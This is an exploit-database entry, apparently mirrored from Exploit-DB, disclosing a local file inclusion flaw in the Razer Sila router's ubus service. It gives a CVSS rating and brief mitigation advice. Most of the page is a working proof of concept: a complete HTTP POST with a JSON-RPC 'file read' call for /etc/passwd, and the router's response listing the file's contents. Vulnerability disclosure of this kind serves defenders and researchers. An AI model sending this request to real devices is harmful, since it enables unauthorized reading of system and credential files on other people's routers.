header-logo
Suggest Exploit
vendor:
Razer Sila
by:
Kevin Randall
7.5
CVSS
HIGH
Local File Inclusion (LFI)
22
CWE
Product Name: Razer Sila
Affected Version From: RazerSila-2.0.441_api-2.0.418
Affected Version To: RazerSila-2.0.441_api-2.0.418
Patch Exists: YES
Related CWE:
CPE: h:razer:razer_sila
Metasploit:
Other Scripts:
Platforms Tested: Razer Sila Router
2022

Razer Sila – Local File Inclusion (LFI)

Razer Sila is vulnerable to a Local File Inclusion (LFI) vulnerability. An attacker can send a malicious POST request to the router's ubus service, which will allow the attacker to read any file on the router. This can be used to gain access to sensitive information such as the router's password file.

Mitigation:

To mitigate this vulnerability, users should ensure that the router is running the latest version of the firmware and that all security patches are applied.
Source

Exploit-DB raw data:

# Exploit Title: Razer Sila - Local File Inclusion (LFI)
# Google Dork: N/A
# Date: 4/9/2022
# Exploit Author: Kevin Randall
# Vendor Homepage: https://www2.razer.com/ap-en/desktops-and-networking/razer-sila
# Software Link: https://www2.razer.com/ap-en/desktops-and-networking/razer-sila
# Version: RazerSila-2.0.441_api-2.0.418
# Tested on: Razer Sila Router
# CVE N/A

# Proof of Concept

# Request
POST /ubus/ HTTP/1.1
Host: 192.168.8.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 123
Origin: https://192.168.8.1
Referer: https://192.168.8.1/
Te: trailers
Connection: close

{"jsonrpc":"2.0","id":3,"method":"call","params":["4183f72884a98d7952d953dd9439a1d1","file","read",{"path":"/etc/passwd"}]}

# Reponse
HTTP/1.1 200 OK
Connection: close
Content-Type: application/json
Content-Length: 537

{"jsonrpc":"2.0","id":3,"result":[0,{"data":"root:x:0:0:root:\/root:\/bin\/ash\ndaemon:*:1:1:daemon:\/var:\/bin\/false\nftp:*:55:55:ftp:\/home\/ftp:\/bin\/false\nnetwork:*:101:101:network:\/var:\/bin\/false\nnobody:*:65534:65534:nobody:\/var:\/bin\/false\ndnsmasq:x:453:453:dnsmasq:\/var\/run\/dnsmasq:\/bin\/false\nmosquitto:x:200:200:mosquitto:\/var\/run\/mosquitto:\/bin\/false\nlldp:x:121:129:lldp:\/var\/run\/lldp:\/bin\/false\nadmin:x:1000:1000:root:\/home\/admin:\/bin\/false\nportal:x:1001:1001::\/home\/portal:\/bin\/false\n"}]}

Navigation

Suggest Exploit

Services By CQR